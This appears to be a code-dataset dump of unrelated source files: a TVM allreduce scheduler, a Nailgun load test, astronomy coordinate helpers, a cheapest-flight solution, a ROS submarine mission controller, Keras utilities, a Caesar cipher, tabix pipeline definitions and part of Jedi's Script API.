                    axis = reduce_axis_map[axis_id][0]
                else:
                    axis = reduce_axis_map[axis_id][1]
                rf = sch.rfactor(op.output(0), axis)
                sch[op].bind(sch[op].op.reduce_axis[0], tx)
                sch[rf].compute_at(sch[op], sch[op].op.reduce_axis[0])
                op_state.allreduce = True
                op_state.rf = rf
                # update the leaf axes and reduce leaf axes
                op_state.leaf_axes["inner"] = [iv for iv in sch[op].op.axis]
                op_state.leaf_axes_belong_to_op["inner"] = op
                op_state.leaf_reduce_axes = reduce_leveled_axes
                op_state.binding["thread"]["x"]["extent"] = tx_extent
                op_state.leaf_reduce_axes_op = op
            # Guard against exceeding the device's per-block thread limit.
            total_threads = 1
            for th in op_state.binding["thread"].values():
                if th["extent"] > 0:
                    total_threads *= th["extent"]
            if total_threads > hd_config.max_threads:
                REFUSE("Threads number exceeds limit: %d vs. %d." % (total_threads, hd_config.max_threads))
            return
        # case 2
        else:
            # tile and bind reduce axes
            use_factor = allreduce_entity.use_factor.choice
            reduce_need_tile = get_need_tile(allreduce_entity.reduce_need_tile)
            reduce_split_factors = get_factors(allreduce_entity.reduce_split_factor_entities)
            reduce_axis_map, reduce_split_axis_list, reduce_split_factor_list = \
                tile_axes(sch, op, sch[op].op.reduce_axis, reduce_need_tile, reduce_split_factors, use_factor == 1)
            _, reduce_leveled_axes = reorder_spatial_and_reduce_axes(sch, op, {}, [], reduce_split_axis_list)
            # update the reduce leaf axes
            op_state.leaf_reduce_axes = reduce_leveled_axes
            op_state.leaf_reduce_axes_op = op
            # do allreduce
            tx = tvm.te.thread_axis("threadIdx.x")
            ASSERT(reduce_need_tile[axis_id], "Bad allredcue decision, forget to split reduce axis!")
            if reduce_split_factors[axis_id][use_factor] <= 1:
                # do not do allreduce
                REFUSE("Allreduce with axis extent 1.")
            else:
                axis = reduce_axis_map[axis_id][use_factor]
                tx_extent = reduce_split_factors[axis_id][use_factor]
                rf = sch.rfactor(op.output(0), axis)
                sch[op].bind(sch[op].op.reduce_axis[0], tx)
                sch[rf].compute_at(sch[op], sch[op].op.reduce_axis[0])
                # update the allredcue
                op_state.allreduce = True
                op_state.rf = rf
                op_state.binding["thread"]["x"]["extent"] = tx_extent
            # Guard against exceeding the device's per-block thread limit.
            total_threads = 1
            for th in op_state.binding["thread"].values():
                if th["extent"] > 0:
                    total_threads *= th["extent"]
            if total_threads > hd_config.max_threads:
                REFUSE("Threads number exceeds limit: %d vs. %d." % (total_threads, hd_config.max_threads))
            # for spatial
            need_tile = get_need_tile(allreduce_entity.need_tile)
            split_factors = get_factors(allreduce_entity.split_factor_entities)
            num_split_axis = 0
            for v in need_tile:
                if v:
                    num_split_axis += 1
            # tile and bind axes
            bx = tvm.te.thread_axis("blockIdx.x")
            by = tvm.te.thread_axis("blockIdx.y")
            bz = tvm.te.thread_axis("blockIdx.z")
            if num_split_axis == 0:
                # bind a dummy axis
                need_tile[0] = True
                axis_map, split_axis_list, split_factor_list = tile_axes(sch, op, sch[op].op.axis, need_tile, split_factors)
                sch[op].bind(split_axis_list[0][0], bx)
                # update the leaf axes
                op_state.leaf_axes["block"] = [split_axis_list[0][0]]
                op_state.leaf_axes["inner"] = [split_axis_list[0][1]]
                op_state.leaf_axes_belong_to_op["block"] = op
                op_state.leaf_axes_belong_to_op["inner"] = op
                op_state.binding["block"]["x"]["extent"] = split_factor_list[0][0]
                # op_state.kernel_scope = split_axis_list[0][0]
                # op_state.kernel_scope_op = op
            elif num_split_axis == 1:
                axis_map, split_axis_list, split_factor_list = tile_axes(sch, op, sch[op].op.axis, need_tile, split_factors)
                leveled_axes, _ = reorder_spatial_and_reduce_axes(sch, op, axis_map, split_axis_list, [])
                sch[op].bind(split_axis_list[0][0], bx)
                op_state.leaf_axes["block"] = leveled_axes[0]
                op_state.leaf_axes["inner"] = leveled_axes[1]
                op_state.leaf_axes_belong_to_op["block"] = op
                op_state.leaf_axes_belong_to_op["inner"] = op
                op_state.binding["block"]["x"]["extent"] = split_factor_list[0][0]
                # op_state.kernel_scope = leveled_axes[0][0]
                # op_state.kernel_scope_op = op
            elif num_split_axis == 2:
                axis_map, split_axis_list, split_factor_list = tile_axes(sch, op, sch[op].op.axis, need_tile, split_factors)
                leveled_axes, _ = reorder_spatial_and_reduce_axes(sch, op, axis_map, split_axis_list, [])
                sch[op].bind(split_axis_list[0][0], by)
                sch[op].bind(split_axis_list[1][0], bx)
                op_state.leaf_axes["block"] = leveled_axes[0]
                op_state.leaf_axes["inner"] = leveled_axes[1]
                op_state.leaf_axes_belong_to_op["block"] = op
                op_state.leaf_axes_belong_to_op["inner"] = op
                op_state.binding["block"]["y"]["extent"] = split_factor_list[0][0]
                op_state.binding["block"]["x"]["extent"] = split_factor_list[1][0]
                # op_state.kernel_scope = leveled_axes[0][0]
                # op_state.kernel_scope_op = op
            elif num_split_axis == 3:
                axis_map, split_axis_list, split_factor_list = tile_axes(sch, op, sch[op].op.axis, need_tile, split_factors)
                leveled_axes, _ = reorder_spatial_and_reduce_axes(sch, op, axis_map, split_axis_list, [])
                sch[op].bind(split_axis_list[0][0], bz)
                sch[op].bind(split_axis_list[1][0], by)
                sch[op].bind(split_axis_list[2][0], bx)
                op_state.leaf_axes["block"] = leveled_axes[0]
                op_state.leaf_axes["inner"] = leveled_axes[1]
                op_state.leaf_axes_belong_to_op["block"] = op
                op_state.leaf_axes_belong_to_op["inner"] = op
                op_state.binding["block"]["z"]["extent"] = split_factor_list[0][0]
                op_state.binding["block"]["y"]["extent"] = split_factor_list[1][0]
                op_state.binding["block"]["x"]["extent"] = split_factor_list[2][0]
                # op_state.kernel_scope = leveled_axes[0][0]
                # op_state.kernel_scope_op = op
            else:
                # More than 3 tiled axes: fuse the leading ones into a single
                # blockIdx.z axis until only two tiled axes remain.
                to_fuse = []
                bz_extent = 1
                ind = 0
                while num_split_axis >= 3:
                    if need_tile[ind]:
                        need_tile[ind] = False
                        num_split_axis -= 1
                        to_fuse_axis = sch[op].op.axis[ind]
                        bz_extent *= to_int(to_fuse_axis.dom.extent)
                        to_fuse.append(to_fuse_axis)
                    ind += 1
                if len(to_fuse) > 1:
                    fused_axis = sch[op].fuse(*to_fuse)
                else:
                    fused_axis = to_fuse[0]
                sch[op].bind(fused_axis, bz)
                axis_map, split_axis_list, split_factor_list = tile_axes(sch, op, sch[op].op.axis, need_tile, split_factors)
                leveled_axes, _ = reorder_spatial_and_reduce_axes(sch, op, axis_map, split_axis_list, [])
                sch[op].bind(split_axis_list[0][0], by)
                sch[op].bind(split_axis_list[1][0], bx)
                op_state.leaf_axes["block"] = [fused_axis] + leveled_axes[0]
                op_state.leaf_axes["inner"] = leveled_axes[1]
                op_state.leaf_axes_belong_to_op["block"] = op
                op_state.leaf_axes_belong_to_op["inner"] = op
                op_state.binding["block"]["z"]["extent"] = bz_extent
                op_state.binding["block"]["y"]["extent"] = split_factor_list[0][0]
                op_state.binding["block"]["x"]["extent"] = split_factor_list[1][0]
                # op_state.kernel_scope = fused_axis
                # op_state.kernel_scope_op = op
            return
    else:
        # Skeleton does not request allreduce: nothing to schedule here.
        return
35909 | # -*- coding: utf-8 -*-
# Copyright 2015 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
from nailgun import consts
from nailgun.test.base import EnvironmentManager
from nailgun.test.performance import base
class NodeGroupOperationsLoadTest(base.BaseUnitLoadTestCase):
    """Load/performance tests for the node-group collection REST handlers."""

    @classmethod
    def setUpClass(cls):
        # Build one neutron/GRE cluster with NODES_NUM nodes plus an extra
        # node group; all timing tests below run against this fixture.
        super(NodeGroupOperationsLoadTest, cls).setUpClass()
        cls.env = EnvironmentManager(app=cls.app, session=cls.db)
        cls.env.upload_fixtures(cls.fixtures)
        cls.cluster = cls.env.create_cluster(
            api=False,
            net_provider=consts.CLUSTER_NET_PROVIDERS.neutron,
            net_segment_type=consts.NEUTRON_SEGMENT_TYPES.gre,
        )
        cls.group = cls.env.create_node_group()
        # NOTE(review): item access `cls.cluster['id']` here vs attribute
        # access `self.cluster.id` below — the cluster object apparently
        # supports both; confirm against EnvironmentManager.
        cls.env.create_nodes(cls.NODES_NUM, cluster_id=cls.cluster['id'])

    @base.evaluate_unit_performance
    def test_node_group_collection_retrieve(self):
        # Time a GET on the node-group collection handler.
        func = functools.partial(
            self.get_handler,
            'NodeGroupCollectionHandler',
        )
        self.check_time_exec(func)

    @base.evaluate_unit_performance
    def test_node_group_collection_create(self):
        # Time a POST creating a new node group in the fixture cluster.
        func = functools.partial(
            self.post_handler,
            'NodeGroupCollectionHandler',
            {
                'cluster_id': self.cluster.id,
                'name': 'test_group',
            }
        )
        self.check_time_exec(func)
| StarcoderdataPython |
3340340 | #! /usr/bin/python3
# -*- coding: utf-8 -*-
__author__ = '<NAME>'
__copyright__ = 'Copyright 2020, cmspy'
__credits__ = ['<NAME>']
__maintainer__ = 'Alan'
__email__ = '<EMAIL>'
__status__ = 'Production'
__all__ = [
'to_skycoord',
'radec2lmn'
]
import numpy as np
from astropy.coordinates import (
SkyCoord
)
import astropy.units as u
# ============================================================= #
# ------------------------ to_skycoord ------------------------ #
# ============================================================= #
def to_skycoord(coord):
    """Build an ICRS :class:`astropy.coordinates.SkyCoord` from an
    ``(ra, dec)`` pair expressed in degrees.
    """
    ra, dec = coord
    return SkyCoord(ra, dec, unit='deg', frame='icrs')
# ============================================================= #
# ============================================================= #
# ------------------------- radec2lmn ------------------------- #
# ============================================================= #
def radec2lmn(skycoord, phase_center):
    """Convert equatorial source coordinates to image-domain ``(l, m, n)``.

    Particularly useful while predicting visibilities.

    :param skycoord:
        Equatorial coordinates of the source, either a
        :class:`astropy.coordinates.SkyCoord` or an ``(ra, dec)`` tuple
        in degrees.
    :param phase_center:
        Phase center of the observation, same accepted types as above.
    :returns: ``(l, m, n)`` direction cosines.
    :rtype: `tuple`

    :Example:
        >>> from cmspy.Astro import radec2lmn
        >>> radec2lmn(
                skycoord=(299.8681, 40.7339),
                phase_center=(0, 90)
            )
    """
    # Normalize both inputs to SkyCoord objects.
    if not isinstance(skycoord, SkyCoord):
        skycoord = to_skycoord(skycoord)
    if not isinstance(phase_center, SkyCoord):
        phase_center = to_skycoord(phase_center)

    ra, dec = skycoord.ra.rad, skycoord.dec.rad
    ra0, dec0 = phase_center.ra.rad, phase_center.dec.rad
    delta_ra = ra - ra0

    # Standard radio-interferometry direction-cosine formulas.
    l = np.cos(dec) * np.sin(delta_ra)
    m = np.sin(dec) * np.cos(dec0) - np.cos(dec) * np.sin(dec0) * np.cos(delta_ra)
    n = np.sqrt(1 - l**2. - m**2.)
    return l, m, n
# ============================================================= #
| StarcoderdataPython |
48953 | <reponame>WatsonWangZh/CodingPractice
# There are n cities connected by m flights.
# Each flight starts from city u and arrives at v with a price w.
# Now given all the cities and flights,
# together with starting city src and the destination dst,
# your task is to find the cheapest price from src to dst with up to k stops.
# If there is no such route, output -1.
# Example 1:
# Input:
# n = 3, edges = [[0,1,100],[1,2,100],[0,2,500]]
# src = 0, dst = 2, k = 1
# Output: 200
# Explanation:
# The graph looks like this:
# The cheapest price from city 0 to city 2 with at most 1 stop costs 200, as marked red in the picture.
# Example 2:
# Input:
# n = 3, edges = [[0,1,100],[1,2,100],[0,2,500]]
# src = 0, dst = 2, k = 0
# Output: 500
# Explanation:
# The graph looks like this:
# The cheapest price from city 0 to city 2 with at most 0 stop costs 500, as marked blue in the picture.
# Constraints:
# The number of nodes n will be in range [1, 100], with nodes labeled from 0 to n - 1.
# The size of flights will be in range [0, n * (n - 1) / 2].
# The format of each flight will be (src, dst, price).
# The price of each flight will be in the range [1, 10000].
# k is in the range of [0, n - 1].
# There will not be any duplicated flights or self cycles.
# M1. DFS
import collections
class Solution:
    """Cheapest flight within K stops via depth-first search with pruning."""

    def findCheapestPrice(self, n: int, flights: List[List[int]], src: int, dst: int, K: int) -> int:
        """Return the cheapest price from src to dst using at most K stops,
        or -1 when no such route exists.
        """
        # Adjacency map: graph[u][v] = price of the direct flight u -> v.
        graph = collections.defaultdict(dict)
        for origin, target, price in flights:
            graph[origin][target] = price

        seen = [0] * n
        # Single-element list acts as a mutable "best cost so far" shared
        # with the recursive helper.
        best = [float('inf')]
        self.dfs(graph, src, dst, K + 1, 0, seen, best)
        return best[0] if best[0] != float('inf') else -1

    def dfs(self, graph, src, dst, k, cost, visited, res):
        """Explore routes from `src`, allowing `k` more edges, pruning any
        path that is already at least as expensive as the best found.
        """
        if src == dst:
            res[0] = cost
            return
        if k == 0:
            return
        for target, price in graph[src].items():
            # Skip nodes on the current path and provably worse routes.
            if visited[target] or cost + price > res[0]:
                continue
            visited[target] = 1
            self.dfs(graph, target, dst, k - 1, cost + price, visited, res)
            visited[target] = 0
# M2. BFS
class Solution:
    """Cheapest flight within K stops via level-order breadth-first search."""

    def findCheapestPrice(self, n: int, flights: List[List[int]], src: int, dst: int, K: int) -> int:
        """Return the cheapest price from src to dst using at most K stops
        (i.e. at most K + 1 flights), or -1 when unreachable.
        """
        # Adjacency map: graph[u][v] = price of the direct flight u -> v.
        graph = collections.defaultdict(dict)
        for origin, target, price in flights:
            graph[origin][target] = price

        best = float('inf')
        que = collections.deque([(src, 0)])
        # Level d of the BFS holds all nodes reachable with exactly d
        # flights; paths with at most K stops use at most K + 1 flights.
        depth = 0
        while que and depth <= K + 1:
            for _ in range(len(que)):
                node, cost = que.popleft()
                if node == dst:
                    best = min(best, cost)
                for target, price in graph[node].items():
                    # Prune extensions already costlier than the best route.
                    if cost + price <= best:
                        que.append((target, cost + price))
            depth += 1
        return best if best != float('inf') else -1
| StarcoderdataPython |
15782 | #!/usr/bin/env python
import rospy
from geometry_msgs.msg import Twist, TransformStamped
from std_msgs.msg import String
from enum import Enum
import tf2_ros
import math
class mission_states(Enum):
    """States of the underwater-mission state machine driven by mission()."""
    STOP = -1               # hold depth, no lateral motion
    SUBMERGE = 0            # descend to the target depth
    MOVE_TO_GATE = 1        # steer toward the detected gate frame
    MOVE_THROUGH_GATE = 2   # keep publishing the saved goal to pass the gate
def checkTolerance(current, wanted, tolerance=0.1):
    """Return True when `current` lies strictly within `tolerance` of `wanted`.

    The tolerance used to be hard-coded to 0.1 inside the body; it is now a
    keyword parameter with the same default, so existing callers behave
    identically while new callers may tighten or loosen it.
    """
    return abs(current - wanted) < tolerance
def mission():
    """Main ROS control loop: drive the sub through SUBMERGE ->
    MOVE_TO_GATE -> MOVE_THROUGH_GATE -> STOP at 10 Hz, publishing goal
    poses on wolf_control/goal and the state name on
    wolf_control/mission_state.
    """
    rospy.init_node('mission_controller', anonymous=True)
    state = mission_states.SUBMERGE
    goal_pub = rospy.Publisher('wolf_control/goal', Twist, queue_size=10)
    state_pub = rospy.Publisher('wolf_control/mission_state', String, queue_size=10)
    tf_buffer = tf2_ros.Buffer()
    # Listener must stay alive for the buffer to be filled.
    listener = tf2_ros.TransformListener(tf_buffer)
    rate = rospy.Rate(10)  # 10hz
    submerge_depth = -1.5  # target depth in the odom frame (meters, negative = down)
    # `timer` counts loop iterations (10 per second); thresholds below are
    # therefore 8 s (80) and 17 s (170).
    timer = 0
    saved_goal = None
    while not rospy.is_shutdown():
        try:
            odom: TransformStamped = tf_buffer.lookup_transform("odom", "base_link", rospy.Time(0))
            if state == mission_states.STOP:
                # Hold depth only; no lateral target.
                goal = Twist()
                goal.linear.z = submerge_depth
                goal_pub.publish(goal)
            if state == mission_states.SUBMERGE:
                goal = Twist()
                goal.linear.z = submerge_depth
                goal.angular.z = odom.transform.rotation.z
                goal_pub.publish(goal)
                if checkTolerance(odom.transform.translation.z, submerge_depth):
                    state = mission_states.MOVE_TO_GATE
                    timer = 0
                    saved_goal = None
            elif state == mission_states.MOVE_TO_GATE:
                gate_vector: TransformStamped = tf_buffer.lookup_transform("odom", "gate", rospy.Time(0))
                goal = Twist()
                # Approach the gate at 10% of its offset each update.
                goal.linear.x = gate_vector.transform.translation.x * 0.1
                goal.linear.y = gate_vector.transform.translation.y * 0.1
                goal.linear.z = submerge_depth
                goal_pub.publish(goal)
                if timer > 80:
                    # Freeze the last goal and drive through the gate with it.
                    saved_goal = goal
                    state = mission_states.MOVE_THROUGH_GATE
                    timer = 0
            elif state == mission_states.MOVE_THROUGH_GATE:
                goal_pub.publish(saved_goal)
                if timer > 170:
                    timer = 0
                    saved_goal = None
                    state = mission_states.STOP
            timer += 1
            state_pub.publish(state.name)
        except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):
            rospy.logerr("mission_code: error finding frame")
        rate.sleep()
if __name__ == '__main__':
    try:
        mission()
    # Raised by rospy on shutdown (e.g. Ctrl-C); exit quietly.
    except rospy.ROSInterruptException:
        pass
| StarcoderdataPython |
11193 | <reponame>hurschler/pig-face-recognition
import logging.config
import util.logger_init
import numpy as np
import tensorflow as tf
from sklearn.metrics import confusion_matrix
from util.tensorboard_util import plot_confusion_matrix, plot_to_image
from tensorflow.python.keras.callbacks_v1 import TensorBoard
from keras import backend as K
class MlModel:
    """Base helper for Keras models used in pig-face recognition.

    NOTE(review): `self.model`, `self.ml_data` and `self.file_writer_cm`
    are never assigned here — presumably set by subclasses; confirm.
    """

    def get_model(self):
        """Return the underlying Keras model."""
        return self.model

    def summary_print(self):
        """Print the Keras model summary to stdout."""
        self.model.summary()

    # Define your scheduling function
    def scheduler(self, epoch):
        """Exponentially decaying learning rate: 0.001 * 0.95**epoch."""
        return 0.001 * 0.95 ** epoch

    def log_confusion_matrix(self, epoch, logs):
        """Predict on the test split and log a confusion-matrix image
        to TensorBoard for this epoch (Keras callback signature).
        """
        # Use the model to predict the values from the test_images.
        test_pred_raw = self.model.predict(self.ml_data.x_test)
        test_pred = np.argmax(test_pred_raw, axis=1)
        # Calculate the confusion matrix using sklearn.metrics
        cm = confusion_matrix(self.ml_data.y_test, test_pred)
        figure = plot_confusion_matrix(cm, class_names=self.ml_data.pig_dict.values())
        cm_image = plot_to_image(figure)
        # Log the confusion matrix as an image summary.
        with self.file_writer_cm.as_default():
            tf.summary.image("Confusion Matrix", cm_image, step=epoch)
# Define TensorBoard callback child class
class LRTensorBoard(TensorBoard):
    """TensorBoard callback that also logs the current learning rate
    under the key 'lr' at the end of every epoch.
    """

    def __init__(self, log_dir, **kwargs):  # add other arguments to __init__ if you need
        super().__init__(log_dir=log_dir, **kwargs)

    def on_epoch_end(self, epoch, logs=None):
        logs = logs or {}
        # Evaluate the optimizer's learning-rate tensor to a Python value.
        logs.update({'lr': K.eval(self.model.optimizer.lr)})
        super().on_epoch_end(epoch, logs)
| StarcoderdataPython |
1634431 | <gh_stars>1-10
import string
def ceaser(plaintext, shift, mode='encode'):
'''
Ceaser cipher encoder and decoder.
:param plaintext: bytes
:param shift: int, Number of characters to shift by.
:param mode: 'encode' from plain to cipher, 'decode' from cipher to plain.
:return: bytes
'''
if type(plaintext) is not bytes:
raise TypeError('plaintext must be bytes.')
alphabet = string.ascii_lowercase.encode()
if mode == 'encode':
shifted_alphabet = alphabet[shift:] + alphabet[:shift]
elif mode == 'decode':
shift *= -1
shifted_alphabet = alphabet[shift:] + alphabet[:shift]
table = bytes.maketrans(alphabet, shifted_alphabet)
return plaintext.translate(table)
def groups(seq, length):
    """Yield consecutive slices of `seq` containing at most `length` items.

    :param seq: A sliceable object like a string, bytes or list.
    :param length: The length of each group; the final group may be shorter
        when ``len(seq)`` is not a multiple of `length`.
    :return: A generator of slices of `seq`.
    """
    # (Removed a commented-out debug print from the original body.)
    for i in range(0, len(seq), length):
        yield seq[i:i + length]
def hexbytes_to_bytestr(bytes_data):
    """Decode an ASCII-hex byte string into bytes.

    Each pair of hex digits is converted to a code point via ``chr`` and
    then UTF-8 encoded, so values above 0x7F expand to multi-byte UTF-8
    sequences (matching the original implementation, which is why this is
    not simply ``bytes.fromhex``).
    """
    pieces = []
    for start in range(0, len(bytes_data), 2):
        code = int(bytes_data[start:start + 2], 16)
        pieces.append(chr(code).encode())
    return b''.join(pieces)
| StarcoderdataPython |
3258568 | <filename>bioprocs/tabix.py
from pyppl import Proc, Box
#from .utils import helpers, runcmd
from . import params
"""
@name:
pTabix
@description:
Use tabix to extract information.
@input:
`infile`: a local or remote file
`region`: a region or a file containing regions
@output:
`outfile:file`: The information extracted from the input file
@args:
`tabix`: The path to `tabix`
`params`: Other params for `tabix`
"""
# Process definition: run tabix to extract records for a region (or a file
# of regions) from a tabix-indexed input file.
pTabix = Proc(desc = 'Use tabix to extract information.')
pTabix.input = "infile, region"
# Output keeps the input's inner extension; .gz inputs are unwrapped one level.
pTabix.output = "outfile:file:{{i.infile | fn | fn}}-{{job.index}}{% if i.infile.endswith('.gz') %}{{i.infile | fn | ext}}{% else %}{{i.infile | ext}}{% endif %}"
pTabix.args.tabix = params.tabix.value
pTabix.args.params = Box(h = True)  # tabix -h: include header lines in the output
pTabix.lang = params.python.value
pTabix.script = "file:scripts/tabix/pTabix.py"
"""
@name:
pTabixIndex
@description:
Generate tabix index file.
@input:
`infile:file`: the input file
- Could be bgzipped.
@output:
`outfile:file`: The bgzipped file
`outidx:file`: The tabix index file
@args:
`tabix`: The path to `tabix`
`params`: Other params for `tabix`
"""
# Process definition: bgzip (optionally) and build a tabix .tbi index for
# the input file.
pTabixIndex = Proc(desc = 'Generate tabix index file')
pTabixIndex.input = "infile:file"
pTabixIndex.output = [
    "outfile:file:{{i.infile | bn}}{% if args.gz %}.gz{% endif %}",
    "outidx:file:{{i.infile | bn}}{% if args.gz %}.gz{% endif %}.tbi"
]
pTabixIndex.args.gz = True  # bgzip the output before indexing
pTabixIndex.args.tabix = params.tabix.value
pTabixIndex.args.params = Box()
pTabixIndex.lang = params.python.value
pTabixIndex.script = "file:scripts/tabix/pTabixIndex.py"
4840406 | <filename>vinplots/_style/__init__.py<gh_stars>0
from ._funcs._modify_axis_spines import _modify_axis_spines as modify_spines | StarcoderdataPython |
1676752 | """
The API basically only provides one class. You can create a :class:`Script` and
use its methods.
Additionally you can add a debug function with :func:`set_debug_function`.
Alternatively, if you don't need a custom function and are happy with printing
debug messages to stdout, simply call :func:`set_debug_function` without
arguments.
.. warning:: Please, note that Jedi is **not thread safe**.
"""
import os
import sys
import warnings
import parso
from parso.python import tree
from jedi._compatibility import force_unicode, is_py3
from jedi.parser_utils import get_executable_nodes
from jedi import debug
from jedi import settings
from jedi import cache
from jedi.api import classes
from jedi.api import interpreter
from jedi.api import helpers
from jedi.api.completion import Completion
from jedi.api.environment import InterpreterEnvironment
from jedi.api.project import get_default_project
from jedi.evaluate import Evaluator
from jedi.evaluate import imports
from jedi.evaluate import usages
from jedi.evaluate.arguments import try_iter_content
from jedi.evaluate.helpers import get_module_names, evaluate_call_of_leaf
from jedi.evaluate.sys_path import transform_path_to_dotted
from jedi.evaluate.filters import TreeNameDefinition, ParamName
from jedi.evaluate.syntax_tree import tree_name_to_contexts
from jedi.evaluate.context import ModuleContext
from jedi.evaluate.context.iterable import unpack_tuple_to_dict
# Jedi uses lots and lots of recursion. By setting this a little bit higher, we
# can remove some "maximum recursion depth" errors.
sys.setrecursionlimit(3000)
class Script(object):
"""
A Script is the base for completions, goto or whatever you want to do with
|jedi|.
You can either use the ``source`` parameter or ``path`` to read a file.
Usually you're going to want to use both of them (in an editor).
The script might be analyzed in a different ``sys.path`` than |jedi|:
- if `sys_path` parameter is not ``None``, it will be used as ``sys.path``
for the script;
- if `sys_path` parameter is ``None`` and ``VIRTUAL_ENV`` environment
variable is defined, ``sys.path`` for the specified environment will be
guessed (see :func:`jedi.evaluate.sys_path.get_venv_path`) and used for
the script;
- otherwise ``sys.path`` will match that of |jedi|.
:param source: The source code of the current file, separated by newlines.
:type source: str
:param line: The line to perform actions on (starting with 1).
:type line: int
:param column: The column of the cursor (starting with 0).
:type column: int
:param path: The path of the file in the file system, or ``''`` if
it hasn't been saved yet.
:type path: str or None
:param encoding: The encoding of ``source``, if it is not a
``unicode`` object (default ``'utf-8'``).
:type encoding: str
:param sys_path: ``sys.path`` to use during analysis of the script
:type sys_path: list
:param environment: TODO
:type environment: Environment
"""
    def __init__(self, source=None, line=None, column=None, path=None,
                 encoding='utf-8', sys_path=None, environment=None):
        """Parse the source (or the file at `path`) and validate the cursor
        position; see the class docstring for parameter semantics.
        """
        self._orig_path = path
        # An empty path (also empty string) should always result in no path.
        self.path = os.path.abspath(path) if path else None

        if source is None:
            # TODO add a better warning than the traceback!
            with open(path, 'rb') as f:
                source = f.read()

        # Load the Python grammar of the current interpreter.
        self._grammar = parso.load_grammar()

        if sys_path is not None and not is_py3:
            sys_path = list(map(force_unicode, sys_path))

        # Resolve the project the script belongs to (cwd for unsaved code).
        project = get_default_project(
            os.path.dirname(self.path)if path else os.getcwd()
        )
        # TODO deprecate and remove sys_path from the Script API.
        if sys_path is not None:
            project._sys_path = sys_path
        self._evaluator = Evaluator(
            project, environment=environment, script_path=self.path
        )
        debug.speed('init')
        self._module_node, source = self._evaluator.parse_and_get_code(
            code=source,
            path=self.path,
            encoding=encoding,
            cache=False,  # No disk cache, because the current script often changes.
            diff_cache=settings.fast_parser,
            cache_path=settings.cache_directory,
        )
        debug.speed('parsed')
        self._code_lines = parso.split_lines(source, keepends=True)
        self._code = source
        # Default to the last line; lines are 1-based.
        line = max(len(self._code_lines), 1) if line is None else line
        if not (0 < line <= len(self._code_lines)):
            raise ValueError('`line` parameter is not in a valid range.')

        line_string = self._code_lines[line - 1]
        line_len = len(line_string)
        # Both checks fire for '\r\n', trimming the full line ending.
        if line_string.endswith('\r\n'):
            line_len -= 1
        if line_string.endswith('\n'):
            line_len -= 1

        # Default to end-of-line; columns are 0-based.
        column = line_len if column is None else column
        if not (0 <= column <= line_len):
            raise ValueError('`column` parameter (%d) is not in a valid range '
                             '(0-%d) for line %d (%r).' % (
                                 column, line_len, line, line_string))
        self._pos = line, column
        self._path = path

        cache.clear_time_caches()
        debug.reset_time()
    def _get_module(self):
        """Create the ModuleContext for this script and register it in the
        import cache under its dotted module name ('__main__' for unsaved
        or unresolvable paths).
        """
        name = '__main__'
        if self.path is not None:
            import_names = transform_path_to_dotted(self._evaluator.get_sys_path(), self.path)
            if import_names is not None:
                name = '.'.join(import_names)

        module = ModuleContext(
            self._evaluator, self._module_node, self.path,
            code_lines=self._code_lines
        )
        # Cache so imports that resolve back to this file find this module.
        imports.add_module_to_cache(self._evaluator, name, module)
        return module
def __repr__(self):
return '<%s: %s %r>' % (
self.__class__.__name__,
repr(self._orig_path),
self._evaluator.environment,
)
    def completions(self):
        """
        Return :class:`classes.Completion` objects. Those objects contain
        information about the completions, more than just names.

        :return: Completion objects, sorted by name and __ comes last.
        :rtype: list of :class:`classes.Completion`
        """
        debug.speed('completions start')
        completion = Completion(
            self._evaluator, self._get_module(), self._code_lines,
            self._pos, self.call_signatures
        )
        completions = completion.completions()

        def iter_import_completions():
            # Yield only completions whose definition is an import statement.
            for c in completions:
                tree_name = c._name.tree_name
                if tree_name is None:
                    continue
                definition = tree_name.get_definition()
                if definition is not None \
                        and definition.type in ('import_name', 'import_from'):
                    yield c

        if len(list(iter_import_completions())) > 10:
            # For now disable completions if there's a lot of imports that
            # might potentially be resolved. This is the case for tensorflow
            # and has been fixed for it. This is obviously temporary until we
            # have a better solution.
            self._evaluator.infer_enabled = False

        debug.speed('completions end')
        return completions
    def goto_definitions(self):
        """
        Return the definitions of a the path under the cursor.  goto function!
        This follows complicated paths and returns the end, not the first
        definition. The big difference between :meth:`goto_assignments` and
        :meth:`goto_definitions` is that :meth:`goto_assignments` doesn't
        follow imports and statements. Multiple objects may be returned,
        because Python itself is a dynamic language, which means depending on
        an option you can have two different versions of a function.

        :rtype: list of :class:`classes.Definition`
        """
        leaf = self._module_node.get_name_of_position(self._pos)
        if leaf is None:
            # Cursor is not on a name; fall back to the raw leaf (keyword,
            # operator, ...) at the position.
            leaf = self._module_node.get_leaf_for_position(self._pos)
            if leaf is None:
                return []

        context = self._evaluator.create_context(self._get_module(), leaf)
        definitions = helpers.evaluate_goto_definition(self._evaluator, context, leaf)

        names = [s.name for s in definitions]
        defs = [classes.Definition(self._evaluator, name) for name in names]
        # The additional set here allows the definitions to become unique in an
        # API sense. In the internals we want to separate more things than in
        # the API.
        return helpers.sorted_definitions(set(defs))
    def goto_assignments(self, follow_imports=False, follow_builtin_imports=False):
        """
        Return the first definition found, while optionally following imports.
        Multiple objects may be returned, because Python itself is a
        dynamic language, which means depending on an option you can have two
        different versions of a function.

        :param follow_imports: The goto call will follow imports.
        :param follow_builtin_imports: If follow_imports is True will decide if
            it follow builtin imports.
        :rtype: list of :class:`classes.Definition`
        """
        def filter_follow_imports(names, check):
            # Recursively resolve names matched by `check`, keeping the
            # import name itself when it ultimately leads into a builtin
            # (no start_pos) and builtin-following is requested.
            for name in names:
                if check(name):
                    new_names = list(filter_follow_imports(name.goto(), check))
                    found_builtin = False
                    if follow_builtin_imports:
                        for new_name in new_names:
                            if new_name.start_pos is None:
                                found_builtin = True

                    if found_builtin and not isinstance(name, imports.SubModuleName):
                        yield name
                    else:
                        for new_name in new_names:
                            yield new_name
                else:
                    yield name

        tree_name = self._module_node.get_name_of_position(self._pos)
        if tree_name is None:
            return []
        context = self._evaluator.create_context(self._get_module(), tree_name)
        names = list(self._evaluator.goto(context, tree_name))

        if follow_imports:
            def check(name):
                return name.is_import()
        else:
            # Submodule names are always resolved, even without follow_imports.
            def check(name):
                return isinstance(name, imports.SubModuleName)

